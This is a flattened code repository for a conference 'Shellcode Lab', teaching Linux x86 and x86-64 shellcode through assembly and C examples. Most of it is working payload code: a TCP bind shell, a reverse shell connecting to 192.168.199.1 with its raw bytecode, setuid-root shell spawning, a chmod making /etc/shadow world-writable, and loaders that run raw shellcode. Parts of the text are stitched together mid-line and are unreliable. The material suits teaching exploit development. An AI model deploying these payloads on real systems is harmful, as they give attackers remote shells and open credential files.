├── README.md ├── x86_32 ├── 0x1_SyscallBasics │ ├── 0x1_Shellcode-Lab_32Bit_Basics.pdf │ └── Example_Code │ │ ├── adduser_etc_passwd.asm │ │ ├── ascii_converter.py │ │ ├── ascii_converter2.py │ │ ├── bad_setuid_shell.asm │ │ ├── chmod_shadow_0bytes.asm │ │ ├── chmod_shadow_no0.asm │ │ ├── crypt_des_tool.py │ │ ├── shell.c │ │ ├── skeleton_mmap.c │ │ └── skeleton_oldschool.c └── 0x2_NetworkShells │ ├── 0x2_ShellcodeLab_32Bit_NetworkShells.pdf │ ├── bindshell_tcp │ ├── bindtcp.asm │ ├── build_x86.sh │ └── testit.c │ └── reverseshell_tcp │ ├── build_x86.sh │ ├── revtcp.asm │ └── testit.c └── x86_64 ├── Example_Code ├── 8bit.asm ├── byte_placement_r10.asm ├── byte_placement_rax.asm ├── clear_register.asm ├── execve.asm ├── execve_setuid.asm ├── exit.asm ├── exit_nulls.asm ├── kill.asm ├── kill_noexit.asm ├── push.asm ├── push_mov.asm ├── skeleton.c └── xchg.asm └── Shellcode-Lab64_0x01.pdf /README.md: -------------------------------------------------------------------------------- 1 | # SHELLCODE-LAB 2 | ``` 3 | _____ __ __ ___ _ _ __ ___ ___ ___ _ ____ ____ 4 | / ___/| | | / _]| | | | / ] / \ | \ / _] | | / || \ 5 | ( \_ | | | / [_ | | | | / / | || \ / [_ _____ | | | o || o ) 6 | \__ || _ || _]| |___ | |___ / / | O || D || _] || |___ | || | 7 | / \ || | || [_ | || / \_ | || || [_|_____|| || _ || O | 8 | \ || | || || || \ || || || | | || | || | 9 | \___||__|__||_____||_____||_____|\____| \___/ |_____||_____| |_____||__|__||_____| 10 | ``` 11 | 12 | Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes. 
* x86_32 - This is the Shellcode Lab for IA-32, i.e. 32-bit x86 CPUs (int 0x80 / socketcall syscall convention) 15 | * x86_64 - This is the Shellcode Lab for x86-64 (AMD64 / Intel 64), i.e. 64-bit x86 CPUs (syscall instruction, different syscall numbers). Note: "IA-64" is Intel's Itanium architecture and is unrelated to these examples
ah forget that :> 48 | 49 | ; exit(23) 50 | mov eax, 1 51 | mov ebx, 23 52 | int 0x80 53 | 54 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/ascii_converter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # ascii converter for shellcoding-lab at hack4 4 | # ~dash in 2014 5 | # 6 | 7 | import sys 8 | import binascii 9 | 10 | text = sys.argv[1] 11 | 12 | def usage(): 13 | print "./%s " % (sys.argv[0]) 14 | if len(sys.argv)<2: 15 | usage() 16 | exit() 17 | 18 | val = binascii.hexlify(text[::-1]) 19 | 20 | print "Stringlen: %d" % len(text) 21 | print "String: %s" % val 22 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/ascii_converter2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | import binascii 5 | 6 | text = sys.argv[1] 7 | 8 | def usage(): 9 | print "./%s " % (sys.argv[0]) 10 | if len(sys.argv)<2: 11 | usage() 12 | exit() 13 | 14 | val = binascii.hexlify(text[::-1]) 15 | 16 | print "Stringlen: %d" % len(text) 17 | print "String: %s" % val 18 | print 19 | for i in range(len(val)): 20 | if i % 8 == 0: 21 | print "push 0x", 22 | 23 | print "\b%c" % val[i], 24 | i=i+1 25 | k = i % 8 26 | if k == 0: 27 | print 28 | 29 | 30 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/bad_setuid_shell.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | _start: 5 | 6 | ;setuid 7 | xor eax, eax 8 | mov ebx, eax 9 | mov eax, 11 10 | int 0x80 11 | 12 | ;execve 13 | xor ecx, ecx 14 | push ecx 15 | push 0x69732f2f 16 | push 0x6e69622f 17 | mov ebx, esp 18 | mov edx, 0x00000000 19 | xor eax, eax 20 | mov eax, 11 21 | int 0x80 22 | 
-------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/chmod_shadow_0bytes.asm: -------------------------------------------------------------------------------- 1 | ; shellcodelab@hack4 2 | ; by dash 3 | 4 | BITS 32 5 | global _start 6 | 7 | _start: 8 | xor eax, eax 9 | xor ebx, ebx 10 | xor ecx, ecx 11 | 12 | ;chmod 13 | mov ecx, 0x1ff ;0777 14 | push ebx ;null terminator 15 | push 0x776f6461 ;/etc/shadow 16 | push 0x68732f63 17 | push 0x74652f2f 18 | mov ebx, esp ;put the address of esp to ebx (shadow) 19 | mov eax, 15 20 | int 0x80 21 | 22 | ;exit 23 | xor eax, eax 24 | xor ebx, ebx 25 | mov eax, 1 26 | int 0x80 27 | 28 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/chmod_shadow_no0.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab@hack4 2 | ; by dash 3 | 4 | BITS 32 5 | global _start 6 | 7 | _start: 8 | xor eax, eax 9 | xor ebx, ebx 10 | xor ecx, ecx 11 | 12 | ;chmod 13 | mov cx, 0x1ff ;0777 14 | push ebx ;null terminator 15 | push 0x776f6461 ;/etc/shadow 16 | push 0x68732f63 17 | push 0x74652f2f 18 | mov ebx, esp ;put the address of esp to ebx (shadow) 19 | mov al, 15 20 | int 0x80 21 | 22 | ;exit 23 | xor eax, eax 24 | xor ebx, ebx 25 | mov al, 1 26 | int 0x80 27 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/crypt_des_tool.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # 3 | # crypt des tool for shellcoding lab at hack4 4 | # ~dash 5 | 6 | import sys 7 | import crypt 8 | 9 | def usage(): 10 | print "%s " % (sys.argv[0]) 11 | 12 | if len(sys.argv)<2: 13 | usage() 14 | exit() 15 | 16 | password = sys.argv[1] 17 | pw = crypt.crypt(password,'AB') 18 | print "Password: %s" % pw 19 | 20 | 
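-------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/shell.c: --------------------------------------------------------------------------------
/* shell.c
   simple shell for shellcoding-lab at hack4 0x1
   probably ripped somewhere
   ~dash

   NOTE(review): the header names were lost when this page was extracted;
   the three includes below are reconstructed from the calls the file
   makes (setuid/execve -> unistd.h, NULL/perror/EXIT_FAILURE ->
   stdio.h/stdlib.h). Verify against the upstream file.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * C reference for what the lab's execve/setuid shellcode does: try to
 * become uid 0, then replace this process with /bin/sh.
 *
 * setuid(0) only succeeds if the process already runs with euid 0 or
 * holds CAP_SETUID; the original ignored its return value and the
 * shell silently came up with the caller's privileges.  We keep the
 * best-effort behaviour (still exec the shell) but report the failure.
 *
 * Returns: does not return on success (execve replaces the image);
 *          EXIT_FAILURE if execve itself fails.
 */
int main(void)
{
    char *args[2];

    if (setuid(0) != 0) {
        /* not fatal: keep the original's behaviour and exec anyway */
        perror("setuid");
    }

    args[0] = "/bin/sh";
    args[1] = NULL;
    execve(args[0], args, NULL);

    /* only reached when execve failed (e.g. /bin/sh missing) */
    perror("execve");
    return EXIT_FAILURE;
}
-------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/skeleton_mmap.c: --------------------------------------------------------------------------------
/*
 * skeleton_mmap.c - run raw shellcode from an anonymous mapping.
 *
 * This is the W^X-friendly loader: the buffer is writable while the
 * bytes are copied in and executable only afterwards, so it works on
 * kernels/toolchains that refuse to execute .data even with
 * -z execstack.  Prefer this over skeleton_oldschool.c.
 *
 * NOTE(review): the two include names were lost in extraction; they are
 * reconstructed from the calls used (mmap/mprotect/munmap -> sys/mman.h,
 * memcpy -> string.h).  stdio.h is added for the error reporting below.
 */
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* paste the "\x31\xc0..." bytes here; sizeof() includes the trailing NUL */
char shellcode[] = "";

int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    /* length of the payload without the string terminator */
    size_t len = sizeof(shellcode) - 1;
    if (len == 0) {
        fputs("no shellcode in the buffer\n", stderr);
        return 1;
    }

    /* Allocate read-write memory (not executable yet) */
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    /* Copy the shellcode into the new memory */
    memcpy(mem, shellcode, len);

    /* Flip the mapping to read-execute; executing without this check
     * would fault on a hardened system where mprotect refuses PROT_EXEC */
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        perror("mprotect");
        munmap(mem, len);
        return 1;
    }

    /* Call the shellcode.  Object-to-function pointer conversion is a
     * POSIX extension, same as the original code relied on. */
    int (*func)(void) = (int (*)(void))mem;
    func();

    /* Only reached if the payload returns; release the mapping */
    munmap(mem, len);

    return 0;
}
-------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/skeleton_oldschool.c: --------------------------------------------------------------------------------
/*
 * skeleton_oldschool.c - jump straight into a global array.
 *
 * Needs an executable data segment (historically obtained with
 * `-z execstack`).  Current x86-64 kernels no longer make .data
 * executable for that flag, so if this segfaults on the first byte use
 * skeleton_mmap.c instead.
 *
 * NOTE(review): the single include name was lost in extraction; it is
 * reconstructed as stdio.h because printf is the only library call.
 */
#include <stdio.h>

unsigned char shellcode[] = "";

int main(void)
{
    /* sizeof()-1 counts embedded NULs too, unlike strlen(); %zu is the
     * correct specifier for size_t (the original used %ld) */
    printf("Shellcode Length: %zu\n", sizeof(shellcode) - 1);

    int (*ret)(void) = (int (*)(void))shellcode;
    ret();

    return 0;
}

--------------------------------------------------------------------------------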
/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0decave/Shellcode-Lab/7632784cec8b436390e5e223726155991dc67458/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | global _start 3 | 4 | ; basic bindshell for shellcode lab 5 | ; by dash 6 | 7 | _start: 8 | ; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h 9 | ; in difference we have to specify everything via socketcall 10 | ; int socketcall(int call, unsigned long *args); 11 | ; 66h / 102 is socketcall 12 | ; /usr/include/linux/net.h 13 | 14 | ; we need a socket, PF_INET, SOCK_STREAM, IPPROTO 15 | ; its *not* sys/socket 16 | ; go to /usr/include/bits/socket.h for domain 17 | ; go to /usr/include/bits/socket_type.h for type 18 | ; go to /usr/include/netinet/in.h for protocol 19 | 20 | ; define socket 21 | xor eax, eax ; clean accumulator 22 | xor ebx, ebx 23 | xor edx, edx ; prepare edx for null 24 | mov al, 0x66 25 | mov bl, 0x1 ; SYS_SOCKET (/usr/include/linux/net.h) 26 | push edx ; IPPROTO == 0 27 | push 0x1 ; SOCK_STREAM == 1 28 | push 0x2 ; AF_INET / PF_INET == 2 29 | mov ecx,esp 30 | int 0x80 31 | 32 | ; define bind 33 | ; EAX has socket fd 34 | ; /usr/include/linux/in.h 35 | ; #define __SOCK_SIZE__ 16 /* sizeof(struct sockaddr) */ 36 | ; typedef unsigned short int sa_family_t; 37 | ; struct sockaddr { 38 | ; sa_family_t sa_family; unsigned short int 2 byte 39 | ; char sa_data[14]; } 40 | 41 | ; we do not want to specify a special ip address 42 | ; we simply define 0.0.0.0 with nulled register 43 | xchg edi, eax 44 | push edx ; 0.0.0.0 45 | push word 0x0A1A ; PORT 6666 46 | push word 0x2 ; AF_INET, sin_family 47 | mov ecx, esp ; 
struct sockaddr *addr 48 | mov esi, ecx ; save struct sockaddr for later use in ESI 49 | push 0x10 ; socklen_t addrlen 50 | push ecx ; sockaddr *addr 51 | push edi ; socket fd 52 | mov ecx, esp 53 | mov bl,0x2 ; SYS_BIND 54 | xor eax, eax ; clean accumulator 55 | mov al,0x66 ; SYS_SOCKETCALL 56 | int 0x80 57 | 58 | ; define listen 59 | ; do socketcall 60 | ; SYS_LISTEN 4 61 | ; int listen(int sockfd, int backlog); 62 | ; 63 | xor eax, eax 64 | mov al,0x66 ; SYS_SOCKETCALL 65 | mov bl,0x4 ; SYS_LISTEN, 1st Argument to SYS_SOCKETCALL 66 | push 0x1 ; backlog 67 | push edi ; sockfd 68 | mov ecx, esp ; 2nd argument to SYS_SOCKETCALL 69 | int 0x80 70 | 71 | ; define accept 72 | ; SYS_ACCEPT 5 73 | ; int accept(int sockfd, struct sockaddr *addr,socklen_t *addrlen); 74 | ; addr + addrlen for client, but we dont care about that 75 | 76 | xor eax, eax ; clean accumulator 77 | mov al,0x66 78 | mov bl,0x5 79 | push edx ; flags, null 80 | push edx 81 | push edi 82 | mov ecx, esp 83 | int 0x80 84 | 85 | ; define dup2 86 | ; dup2 duplicate the FDs to the shell 87 | ; new sockfd is in EAX 88 | ; int dup2(int oldfd, int newfd); 89 | 90 | xor ecx, ecx 91 | mov cl,0x2 92 | xchg ebx,eax 93 | loop: 94 | xor eax, eax ; clean accumulator 95 | mov al,0x3F 96 | int 0x80 97 | dec ecx 98 | jns loop ; if ecx is *not* -1 (SIGN Flag) 99 | 100 | ; define execve 101 | ; spawning a shell 102 | ; int execve(const char *filename, char *const argv[], char *const envp[]); 103 | ; 104 | 105 | xor eax, eax ; clean accumulator 106 | xor esi, esi 107 | push esi 108 | mov edx, esp ; 3rd argument 109 | push esi ; NULL 110 | push 0x68732f6e ; n/sh 111 | push 0x69622f2f ; //bi 112 | mov ebx, esp ; 1st argument 113 | mov ecx, edx ; 2nd argument 114 | mov al,0xb 115 | int 0x80 116 | -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 
# easy build script for shellcode class. Note: nasm and ld are chained with ';', so a failed assemble still links a stale .o from a previous run; chain them with '&&' (and quote "$name") if you adapt this
reverseshell for shellcode lab 5 | ; by dash 6 | 7 | _start: 8 | ; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h 9 | ; in difference we have to specify everything via socketcall 10 | ; int socketcall(int call, unsigned long *args); 11 | ; 66h / 102 is socketcall 12 | ; /usr/include/linux/net.h 13 | 14 | ; we need a socket, PF_INET, SOCK_STREAM, IPPROTO 15 | ; its *not* sys/socket 16 | ; go to /usr/include/bits/socket.h for domain 17 | ; go to /usr/include/bits/socket_type.h for type 18 | ; go to /usr/include/netinet/in.h for protocol 19 | 20 | ; define socket 21 | xor eax, eax ; clean accumulator 22 | xor ebx, ebx ; clean it as well 23 | xor edx, edx ; prepare edx for null 24 | mov al, 0x66 ; put 102 into AL, sys_socketcall 25 | mov bl, 0x1 ; SYS_SOCKET (/usr/include/linux/net.h) 26 | push edx ; IPPROTO == 0 27 | push 0x1 ; SOCK_STREAM == 1 28 | push 0x2 ; AF_INET / PF_INET == 2 29 | mov ecx,esp 30 | int 0x80 31 | 32 | ; connect 33 | ; call is basically the same as bind 34 | ;xchg edi, eax 35 | push 0x01C7A8C0 ; 192.168.199.1 36 | push word 0x0A1A ; PORT 6666 37 | push word 0x2 ; AF_INET, sin_family 38 | mov ecx, esp ; struct sockaddr *addr 39 | mov esi, ecx ; save struct sockaddr for later use in ESI 40 | push 0x10 ; socklen_t addrlen 41 | push ecx ; sockaddr *addr 42 | push edi ; socket fd 43 | mov ecx, esp 44 | mov bl,0x3 ; SYS_CONNECT 45 | xor eax, eax ; clean accumulator 46 | mov al,0x66 ; SYS_SOCKETCALL 47 | int 0x80 48 | ; define dup2 49 | ; dup2 duplicate the FDs to the shell 50 | ; new sockfd is in EAX 51 | ; int dup2(int oldfd, int newfd); 52 | 53 | xor ecx, ecx 54 | mov cl,0x2 55 | mov ebx,edi 56 | loop: 57 | xor eax, eax ; clean accumulator 58 | mov al,0x3F 59 | int 0x80 60 | dec ecx 61 | jns loop ; if ecx is *not* -1 (SIGN Flag) 62 | 63 | ; define execve 64 | ; spawning a shell 65 | ; int execve(const char *filename, char *const argv[], char *const envp[]); 66 | ; 67 | 68 | xor eax, eax ; clean accumulator 69 | xor esi, esi 70 | push esi 71 
| mov edx, esp ; 3rd argument 72 | push esi ; NULL 73 | push 0x68732f6e ; n/sh 74 | push 0x69622f2f ; //bi 75 | mov ebx, esp ; 1st argument 76 | mov ecx, edx ; 2nd argument 77 | mov al,0xb 78 | int 0x80 79 | -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | unsigned char shellcode[] = \ 4 | "\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1b\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x68\xc0\xa8\xc7\x67\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x03\x31\xc0\xb0\x66\xcd\x80\x31\xc9\xb1\x02\x89\xfb\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80"; 5 | main() 6 | { 7 | printf("Shellcode Length: %d\n", sizeof(shellcode) - 1); 8 | int (*ret)() = (int(*)())shellcode; 9 | ret(); 10 | } 11 | 12 | 13 | -------------------------------------------------------------------------------- /x86_64/Example_Code/8bit.asm: -------------------------------------------------------------------------------- 1 | ; 8 bit registers 'undocumented', test 2 | ; dash@hack4.org 3 | ; May 2016 4 | ; 5 | ; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode 6 | ; however, they are addressable 7 | ; just adding right now a l to 16bit registers 8 | ; 9 | 10 | BITS 64 11 | 12 | global _start 13 | _start: 14 | 15 | mov spl, 1 16 | mov bpl, 2 17 | mov sil, 3 18 | mov dil, 4 19 | -------------------------------------------------------------------------------- /x86_64/Example_Code/byte_placement_r10.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64bit 2 | ; dash@hack4.org 3 | ; byte placements on 64 bit - example for new register 
r10 4 | BITS 64 5 | global _start 6 | 7 | _start: 8 | 9 | ; former general purpose register 10 | sub r10, r10 11 | 12 | mov r10, 0x4142434445464748 13 | sub r10, r10 14 | 15 | mov r10d, 0x41424344 16 | sub r10d, r10d 17 | 18 | mov r10w, 0x4142 19 | sub r10w, r10w 20 | 21 | mov r10b,0x42 22 | sub r10b, r10b 23 | -------------------------------------------------------------------------------- /x86_64/Example_Code/byte_placement_rax.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64bit 2 | ; dash@hack4.org 3 | ; byte placements on 64 bit - example 4 | BITS 64 5 | global _start 6 | 7 | _start: 8 | 9 | ; former general purpose register, example 10 | ; sub is used to clear out the register 11 | sub rax, rax 12 | 13 | mov rax, 0x4142434445464748 14 | sub rax, rax 15 | 16 | mov eax, 0x41424344 17 | sub eax, eax 18 | 19 | ; address 16bit 20 | mov ax, 0x4142 21 | 22 | ; overwrite the higher byte of ax 23 | ; 0x4142 gets to 0x2d42 24 | mov ah,0x2d 25 | sub ah, ah 26 | 27 | mov al,0x41 28 | sub al, al 29 | -------------------------------------------------------------------------------- /x86_64/Example_Code/clear_register.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64 2 | ; dash@hack4.org 3 | ; 4 | 5 | ; some example to zero-out a register 6 | BITS 64 7 | global _start 8 | _start: 9 | 10 | xor rax, rax ; initial clearing - classic xor 11 | mov rax, 0xDEADBEEF 12 | sub rax, rax ; sub opcode 13 | 14 | mov rax, 0xF00DBABE 15 | xor rax, rax ; classic xor 16 | 17 | ; check value of register and add or sub from that 18 | ; let's assume 29A is in the register rcx 19 | sub rcx, rcx 20 | mov rcx, 0x29A 21 | sub rcx, 666 22 | ; zero'd 23 | -------------------------------------------------------------------------------- /x86_64/Example_Code/execve.asm: -------------------------------------------------------------------------------- 1 | BITS 64 2 | global _start 3 | 4 | 
_start: 5 | 6 | xor rax, rax 7 | 8 | push rax ; null terminator for the string 9 | mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards 10 | push rbx ; 11 | mov rdi, rsp ; move address from stack pointer to first argument 12 | 13 | push rax 14 | push rdi ; actually we would not need this one 15 | mov rsi, rsp ; move the address to the 2nd argument 16 | 17 | mov rdx, rax ; no envp necessary 18 | 19 | mov al,0x3B ; execve into rax 20 | 21 | syscall 22 | -------------------------------------------------------------------------------- /x86_64/Example_Code/execve_setuid.asm: -------------------------------------------------------------------------------- 1 | BITS 64 2 | global _start 3 | 4 | _start: 5 | 6 | xor rax, rax 7 | push rax ; push the cleared register 8 | pop rdi ; pop the zer0z into 1st argument 9 | 10 | add al,0x69 ; setuid 105 or 0x69h 11 | syscall ; call setuid(0) 12 | 13 | 14 | xor rax, rax 15 | 16 | push rax ; null terminator for the string 17 | mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards 18 | push rbx ; 19 | mov rdi, rsp ; move address from stack pointer to first argument 20 | 21 | push rax 22 | push rdi ; actually we would not need this one 23 | mov rsi, rsp ; move the address to the 2nd argument 24 | 25 | mov rdx, rax ; no envp necessary 26 | 27 | mov al,0x3B ; execve into rax 28 | 29 | syscall 30 | -------------------------------------------------------------------------------- /x86_64/Example_Code/exit.asm: -------------------------------------------------------------------------------- 1 | ; shellcode lab 64Bit 2 | ; exit example as it should be ;) 3 | ; dsah@hack4.org 4 | ; 5 | BITS 64 6 | global _start 7 | 8 | _start: 9 | 10 | xor rax,rax 11 | xor rdx,rdx 12 | mov al,0x3C 13 | mov dil,4 14 | syscall 15 | -------------------------------------------------------------------------------- /x86_64/Example_Code/exit_nulls.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab 64Bit 2 | ; dash@hack4.org 
3 | ; exit code with null bytes 4 | ; 5 | 6 | BITS 64 7 | 8 | global _start 9 | 10 | _start: 11 | 12 | xor rax,rax 13 | xor rdx,rdx 14 | mov rax,0x3C 15 | mov rdx,4 16 | syscall 17 | -------------------------------------------------------------------------------- /x86_64/Example_Code/kill.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab 64Bit 2 | ; dash@hack4.org 3 | ; kill + exit 4 | ; 5 | 6 | 7 | BITS 64 8 | global _start 9 | 10 | _start: 11 | 12 | xor rax, rax 13 | xor rdi, rdi 14 | xor rsi, rsi 15 | 16 | 17 | mov dil, 1368 18 | mov sil,9 19 | mov al, 62 20 | syscall 21 | 22 | xor rax, rax 23 | xor rdi, rdi 24 | 25 | add dil, 4 26 | mov al, 60 27 | syscall 28 | -------------------------------------------------------------------------------- /x86_64/Example_Code/kill_noexit.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64bit 2 | ; dash@hack4.org 3 | ; don't execute that as root, as long as adjusted 4 | ; 5 | 6 | BITS 64 7 | global _start 8 | 9 | _start: 10 | 11 | xor rax, rax 12 | xor rdi, rdi 13 | xor rsi, rsi 14 | 15 | mov dil, 1 ; you might not want to run that as root 16 | mov sil,9 17 | mov al, 62 18 | syscall 19 | -------------------------------------------------------------------------------- /x86_64/Example_Code/push.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64 2 | ; dash@hack4.org 3 | ; push example and 8byte fun on 64bit architecture 4 | ; 5 | 6 | BITS 64 7 | 8 | global _start 9 | _start: 10 | 11 | push byte 0x41 12 | push word 0x4142 13 | push dword 0x41424344 14 | ; let's comment that out 15 | ; comment it in to see the compile error 16 | ;push 0x4142434445464748 17 | -------------------------------------------------------------------------------- /x86_64/Example_Code/push_mov.asm: -------------------------------------------------------------------------------- 1 | ; 
shellcode-lab64 2 | ; dash@hack4.org 3 | ; push example and 8byte fun on 64bit architecture 4 | ; use mov to bring up your 8byte value on the stack 5 | ; 6 | 7 | BITS 64 8 | 9 | global _start 10 | _start: 11 | 12 | xor rax, rax ; clear register 13 | mov rax, 0x4142434445464748 ; place 8byte in register rax 14 | push rax ; push it onto the stack 15 | -------------------------------------------------------------------------------- /x86_64/Example_Code/skeleton.c: -------------------------------------------------------------------------------- 1 | /* shellcode-lab 64Bit 2 | dash@hack4.org 3 | 4 | use -z execstack 5 | or set char code to const 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | unsigned char code[] ="shellcode wants to be placed here!"; 12 | main() 13 | { 14 | printf("Shellcode Len: %d\n", (int)strlen(code)); 15 | int (*ret)() = (int(*)())code; 16 | ret(); 17 | } 18 | -------------------------------------------------------------------------------- /x86_64/Example_Code/xchg.asm: -------------------------------------------------------------------------------- 1 | ; xchg example code 2 | ; dash@hack4.org 3 | ; shellcode lab 4 | ; may 2016 5 | 6 | BITS 64 7 | global _start 8 | 9 | _start: 10 | 11 | xor rax, rax 12 | xor rbx, rbx 13 | 14 | mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/ 15 | mov rbx, 0x539 16 | mov r10, 0xBEEFBEEFBEEFBEEF 17 | xchg rax, r10 18 | xchg r10, r9 19 | xchg rbx, rax 20 | xchg rdi,rsp 21 | -------------------------------------------------------------------------------- /x86_64/Shellcode-Lab64_0x01.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0decave/Shellcode-Lab/7632784cec8b436390e5e223726155991dc67458/x86_64/Shellcode-Lab64_0x01.pdf --------------------------------------------------------------------------------